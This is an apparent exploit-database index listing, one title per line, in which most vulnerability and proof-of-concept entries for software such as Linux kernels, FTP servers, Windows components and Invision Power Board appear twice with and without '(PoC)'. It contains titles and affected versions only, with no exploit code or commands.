ConQuest DICOM Server 1.4.17d - Stack Buffer Overflow
ConQuest DICOM Server 1.4.17d - Stack Buffer (PoC)

QNAP NVR/NAS - Buffer Overflow
QNAP NVR/NAS - Buffer Overflow (PoC)
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow
CDex 1.96 - Buffer Overflow
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)
CDex 1.96 - Buffer Overflow (PoC)

Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)

D3DGear 5.00 Build 2175 - Buffer Overflow
D3DGear 5.00 Build 2175 - Buffer Overflow (PoC)
VX Search Enterprise 10.1.12 - Denial of Service
Disk Pulse Enterprise 10.1.18 - Denial of Service
Sync Breeze Enterprise 10.1.16 - Denial of Service
DiskBoss Enterprise 8.5.12 - Denial of Service
BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)

APNGDis 2.8 - 'filename' Stack Buffer Overflow
APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)

wifirxpower - Local Buffer Overflow
wifirxpower - Local Buffer Overflow (PoC)
pinfo 0.6.9 - Local Buffer Overflow
Dmitry 1.3a - Local Buffer Overflow
pinfo 0.6.9 - Local Buffer Overflow (PoC)
Dmitry 1.3a - Local Buffer Overflow (PoC)

Mapscrn 2.03 - Local Buffer Overflow
Mapscrn 2.03 - Local Buffer Overflow (PoC)

Stunnel 3.24/4.00 - Daemon Hijacking (PoC)
Stunnel 3.24/4.00 - Daemon Hijacking

Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)

Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator

WinZip - MIME Parsing Overflow (PoC)
WinZip - MIME Parsing Overflow
glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)
GNU Sharutils 4.2.1 - Local Format String (PoC)
glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow
GNU Sharutils 4.2.1 - Local Format String
GD Graphics Library - Local Heap Overflow (PoC)
libxml 2.6.12 nanoftp - Buffer Overflow (PoC)
GD Graphics Library - Local Heap Overflow
libxml 2.6.12 nanoftp - Buffer Overflow

WinRAR 3.4.1 - Corrupt '.ZIP' File (PoC)
WinRAR 3.4.1 - Corrupt '.ZIP' File

Exim 4.41 - 'dns_build_reverse' Local (PoC)
Exim 4.41 - 'dns_build_reverse' Local
tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)
Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030)
tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow
Microsoft Windows - NtClose DeadLock (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)

Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)
Microsoft Word 2000/2003 - Hlink Local Buffer Overflow

Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)
Cheese Tracker 0.9.9 - Local Buffer Overflow

PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC)
PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow

BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow (PoC)
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow

Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST (PoC)
Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST
PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC)
PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow

PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC)
PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation (PoC)
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak

Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)

Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)
Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow

Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)
Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow

DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)
DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak

XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)
XnView 1.93.6 - '.taac' Local Buffer Overflow
OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow (PoC)
Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)
OllyDBG 1.10 and ImpREC 1.7f - Export Name Buffer Overflow
Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution

Microsoft Windows Server 2003 - Token Kidnapping Local (PoC)
Microsoft Windows Server 2003 - Token Kidnapping Local

Debian - Symlink In Login Arbitrary File Ownership (PoC)
Debian - Symlink In Login Arbitrary File Ownership

Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)
Trend Micro Internet Security Pro 2009 - Priviliege Escalation

Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (PoC) (SEH)
Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (SEH)

Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)
Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure

Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)
Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow

GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)
GPG2/Kleopatra 2.0.11 - Malformed Certificate

Alleycode 2.21 - Local Overflow (SEH) (PoC)
Alleycode 2.21 - Local Overflow (SEH)

GPG4Win GNU - Privacy Assistant (PoC)
GPG4Win GNU - Privacy Assistant

VMware Fusion 2.0.5 - vmx86 kext Local (PoC)
VMware Fusion 2.0.5 - vmx86 kext Local

Mozilla Codesighs - Memory Corruption (PoC)
Mozilla Codesighs - Memory Corruption

Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)
Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow

LDAP - Injection (PoC)
LDAP - Injection

QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)
QuickZip 4.x - '.zip' Local Universal Buffer Overflow
ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow (PoC)
Crimson Editor r3.70 - Overwrite (SEH) (PoC)
Kenward Zipper 1.4 - Local Stack Buffer Overflow (PoC)
ZippHo 3.0.6 - '.zip' Local Stack Buffer Overflow
Crimson Editor r3.70 - Overwrite (SEH)
Kenward Zipper 1.4 - Local Stack Buffer Overflow

Stud_PE 2.6.05 - Local Stack Overflow (PoC)
Stud_PE 2.6.05 - Local Stack Overflow

Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow (PoC)
Zip Unzip 6.0 - '.zip' Local Stack Buffer Overflow

EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC)
EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow

Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC)
Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow
PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)
Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow (PoC)
PhotoFiltre Studio X - '.tif' Local Buffer Overflow
Beyond Compare 3.0.13 b9599 - '.zip' Local Stack Buffer Overflow

Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow (PoC)
Shellzip 3.0 Beta 3 - '.zip' Local Stack Buffer Overflow

Audio Converter 8.1 - Local Stack Buffer Overflow (PoC)
Audio Converter 8.1 - Local Stack Buffer Overflow
Audio Converter 8.1 - Local Stack Buffer Overflow (PoC) ROP/WPM
SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)
Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM
SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow

BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (PoC) (ASLR + DEP Bypass)
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overflow (ASLR + DEP Bypass)

Acoustica Audio Converter Pro 1.1 (build 25) -  '.mp3 / .wav / .ogg / .wma' Local Heap Overflow (PoC)
Acoustica Audio Converter Pro 1.1 (build 25) - '.mp3 / .wav / .ogg / .wma' Local Heap Overflow

Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure

Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow (PoC)
Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow

PHP 5.3.6 - Local Buffer Overflow (ROP) (PoC)
PHP 5.3.6 - Local Buffer Overflow (ROP)

Xorg 1.4 < 1.11.2 - File Permission Change (PoC)
Xorg 1.4 < 1.11.2 - File Permission Change

Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets

Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)
Linux Kernel 2.2.x - 'sysctl()' Memory Reading

Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042)

Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC)
Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation

HT Editor 2.0.20 - Local Buffer Overflow (ROP) (PoC)
HT Editor 2.0.20 - Local Buffer Overflow (ROP)

Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC)
Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read

Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)
Linux Kernel 2.6 - Console Keymap Local Command Injection

ACE Stream Media 2.1 - 'acestream://' Format String (PoC)
ACE Stream Media 2.1 - 'acestream://' Format String

Linux Kernel 3.13 - SGID Privilege Escalation (PoC)
Linux Kernel 3.13 - SGID Privilege Escalation

Comodo Internet Security - HIPS/Sandbox Escape (PoC)
Comodo Internet Security - HIPS/Sandbox Escape

Palringo 2.8.1 - Local Stack Buffer Overflow (PoC)
Palringo 2.8.1 - Local Stack Buffer Overflow
Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)
Rowhammer - NaCl Sandbox Escape (PoC)
Linux Kernel (x86-64) - Rowhammer Privilege Escalation
Rowhammer - NaCl Sandbox Escape

Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation (PoC)
Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation

Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)
Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (MS15-052)

Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
Linux (x86) - Memory Sinkhole Privilege Escalation

Core FTP Server 1.2 - Local Buffer Overflow (PoC)
Core FTP Server 1.2 - Local Buffer Overflow

Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)
Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (MS16-051)

VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)
VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)

GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
GNU Screen 4.5.0 - Local Privilege Escalation
Man-db 2.6.7.1 - Local Privilege Escalation (PoC)
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC)
Man-db 2.6.7.1 - Local Privilege Escalation
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation

Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation (PoC)
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)
TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change

Multiple CPUs - 'Spectre' Information Disclosure (PoC)
Multiple CPUs - 'Spectre' Information Disclosure

Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation

glibc ld.so - Memory Leak / Buffer Overflow
GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow

Microsoft IIS 5.0 - WebDAV Remote (PoC)
Microsoft IIS 5.0 - WebDAV Remote

Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)
Microsoft Windows Server 2000 - RSVP Server Authority Hijacking

ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)

Titan FTP Server - Long Command Heap Overflow (PoC)
Titan FTP Server - Long Command Heap Overflow

SLX Server 6.1 - Arbitrary File Creation (PoC)
SLX Server 6.1 - Arbitrary File Creation

zgv 5.5 - Multiple Arbitrary Code Executions (PoC)
zgv 5.5 - Multiple Arbitrary Code Executions

Microsoft Internet Explorer - Remote Code Execution (PoC)
Microsoft Internet Explorer - Remote Code Execution

Exim 4.43 - 'auth_spa_server()' Remote (PoC)
Exim 4.43 - 'auth_spa_server()' Remote

Microsoft Windows - DTC Remote (PoC) (MS05-051) (2)
Microsoft Windows - DTC Remote (MS05-051) (2)

Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)
Watchfire AppScan QA 5.0.x - Remote Code Execution

KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow

Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)
Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (MS06-005) (2)

RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow (PoC)
RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow

AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC)
AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution

Easy File Sharing FTP Server 2.0 - 'PASS' Remote (PoC)
Easy File Sharing FTP Server 2.0 - 'PASS' Remote

BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)
BulletProof FTP Client 2.45 - Remote Buffer Overflow

Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC)
Intel Centrino ipw2200BG - Wireless Driver Remote Overflow

WebMod 0.48 - Content-Length Remote Buffer Overflow (PoC)
WebMod 0.48 - Content-Length Remote Buffer Overflow

OpenBSD - ICMPv6 Fragment Remote Execution (PoC)
OpenBSD - ICMPv6 Fragment Remote Execution

Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)

Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)
Apple Safari 3 for Windows Beta - Remote Command Execution

Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)
Flash Player/Plugin Video - File Parsing Remote Code Execution

Apple QuickTime (Multiple Browsers) - Command Execution (PoC)
Apple QuickTime (Multiple Browsers) - Command Execution

Apple QuickTime /w IE .qtl Version XAS - Remote (PoC)
Apple QuickTime /w IE .qtl Version XAS - Remote

QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC)
QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow

ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)
ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod

HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC)
HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method

Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting (PoC)
Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal

MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)
MicroTik RouterOS 3.13 - SNMP write (Set request)

Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)
Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload

Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)
Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution

Opera 9.61 - 'opera:historysearch' Code Execution (PoC)
Opera 9.61 - 'opera:historysearch' Code Execution

Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)
Chilkat Crypt - ActiveX Arbitrary File Creation/Execution

Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)
Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection (PoC)
Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection

GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC)
GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption

Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)

Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)
Zervit Web Server 0.4 - Directory Traversal / Memory Corruption

Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)
Apple Mac OSX - Java applet Remote Deserialization Remote (2)

VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)
VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow

Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)
Microsoft Internet Explorer 5/6/7 - Memory Corruption (MS09-054)

Pegasus Mail Client 4.51 - Remote Buffer Overflow (PoC)
Pegasus Mail Client 4.51 - Remote Buffer Overflow

TLS - Renegotiation (PoC)
TLS - Renegotiation
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)
Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)
Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution
Trend Micro Web-Deployment - ActiveX Remote Execution

MX Simulator Server - Remote Buffer Overflow (PoC)
MX Simulator Server - Remote Buffer Overflow
Apache OFBiz - Remote Execution (via SQL Execution) (PoC)
Apache OFBiz - Admin Creator (PoC)
Apache OFBiz - Remote Execution (via SQL Execution)
Apache OFBiz - Admin Creator

Adobe Flash / Reader - Live Malware (PoC)
Adobe Flash / Reader - Live Malware

Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow (PoC)
Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow

KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)
KingView 6.5.3 - SCADA HMI Heap Overflow

Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002)
Microsoft Data Access Components - Remote Overflow (MS11-002)
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution

Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)
Solar FTP Server 2.1.1 - PASV Buffer Overflow

Apache mod_proxy - Reverse Proxy Exposure (PoC)
Apache mod_proxy - Reverse Proxy Exposure

Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)
Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite

Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)
Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite

Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC)
Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution

OpenVAS Manager 4.0 - Authentication Bypass (PoC)
OpenVAS Manager 4.0 - Authentication Bypass

w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)
w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution

Legend Perl IRC Bot - Remote Code Execution (PoC)
Legend Perl IRC Bot - Remote Code Execution

dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)

WebDrive 12.2 (Build #4172) - Remote Buffer Overflow (PoC)
WebDrive 12.2 (Build #4172) - Remote Buffer Overflow

Endian Firewall < 3.0.0 - OS Command Injection (Python) (PoC)
Endian Firewall < 3.0.0 - OS Command Injection (Python)

Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access

OpenSSHd 7.2p2 - Username Enumeration (PoC)
OpenSSHd 7.2p2 - Username Enumeration

Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution

Intel Active Management Technology - System Privileges

Xplico - Remote Code Execution (Metasploit)

Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution

S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)
S9Y Serendipity 0.7-beta1 - SQL Injection

AWStats 5.7 < 6.2 - Multiple Remote (PoC)
AWStats 5.7 < 6.2 - Multiple Remote

WoltLab Burning Book 1.1.2 - SQL Injection (PoC)
WoltLab Burning Book 1.1.2 - SQL Injection

Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection
Invision Power Board (IP.Board) 2.1.7 - 'ACTIVE' Cross-Site Scripting / SQL Injection

EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)
EQdkp 1.3.2f - 'user_id' Authentication Bypass

Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)
Invision Power Board (IP.Board) 2.3.5 - Multiple Vulnerabilities (2)

FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)
FOSS Gallery Public 1.0 - Arbitrary File Upload

Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)
Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection

Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)
Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation

Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure
Invision Power Board (IP.Board) 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure

Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)
Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption

IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)
IPB (nv2) Awards < 1.1.0 - SQL Injection

X-Cart Pro 4.0.13 - SQL Injection (PoC)
X-Cart Pro 4.0.13 - SQL Injection

Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC)
Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute

IPB 3.0.1 - SQL Injection
Invision Power Board 3.0.1 - SQL Injection

WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)
WebsiteBaker 2.8.1 - Cross-Site Request Forgery
BS Auto Classifieds - 'info.php' SQL Injection (PoC)
BS Business Directory - 'articlesdetails.php' SQL Injection (PoC)
BS Classifieds Ads - 'articlesdetails.php' SQL Injection (PoC)
BS Events Directory - 'articlesdetails.php' SQL Injection (PoC)
BS Auto Classifieds - 'info.php' SQL Injection
BS Business Directory - 'articlesdetails.php' SQL Injection
BS Classifieds Ads - 'articlesdetails.php' SQL Injection
BS Events Directory - 'articlesdetails.php' SQL Injection

BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)
BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password)

Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)
Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account)

SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)
SWAT Samba Web Administration Tool - Cross-Site Request Forgery

Plone and Zope - Remote Command Execution (PoC)
Plone and Zope - Remote Command Execution

Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting
Invision Power Board (IP.Board) 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting

Invision Power Board 1.x - 'index.php' showtopic Cross-Site Scripting
Invision Power Board (IP.Board) 1.x - 'index.php' showtopic Cross-Site Scripting

Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 1.3 - Multiple Cross-Site Scripting Vulnerabilities

Invision Power Board 1.3 - 'Pop' Cross-Site Scripting
Invision Power Board (IP.Board) 1.3 - 'Pop' Cross-Site Scripting

Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting
Invision Power Board (IP.Board) 1.3 - 'SSI.php' Cross-Site Scripting

Invision Power Services Invision Board 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities

Invision Power Board 1.x/2.0.3 - SML Code Script Injection
Invision Power Board (IP.Board) 1.x/2.0.3 - SML Code Script Injection

IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover
Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover

Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.3/2.1 - 'Act' Cross-Site Scripting

Invision Power Board 1.0.3 - Attached File Cross-Site Scripting
Invision Power Board (IP.Board) 1.0.3 - Attached File Cross-Site Scripting

Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Invision Power Services Invision Board 2.0.4 - 'index.php?st' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - 'index.php?st' Cross-Site Scripting

Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities
Invision Power Board (IP.Board) 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities
Invision Power Services Invision Board 2.0.4 - Print Action 't' Cross-Site Scripting
Invision Power Services Invision Board 2.0.4 - Mail Action 'MID' Cross-Site Scripting
Invision Power Services Invision Board 2.0.4 - Help Action 'HID' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - Print Action 't' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - Mail Action 'MID' Cross-Site Scripting
Invision Power Board (IP.Board) 2.0.4 - Help Action 'HID' Cross-Site Scripting

Invision Power Board 1.x/2.x - Multiple SQL Injections
Invision Power Board (IP.Board) 1.x/2.x - Multiple SQL Injections

Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities
Invision Power Board (IP.Board) 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities

Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting
Invision Power Board (IP.Board) 3.0.3 - '.txt' MIME-Type Cross-Site Scripting

IP Board 3.x - Cross-Site Request Forgery / Token Hjiacking
Invision Power Board (IP.Board) 3.x - Cross-Site Request Forgery / Token Hjiacking

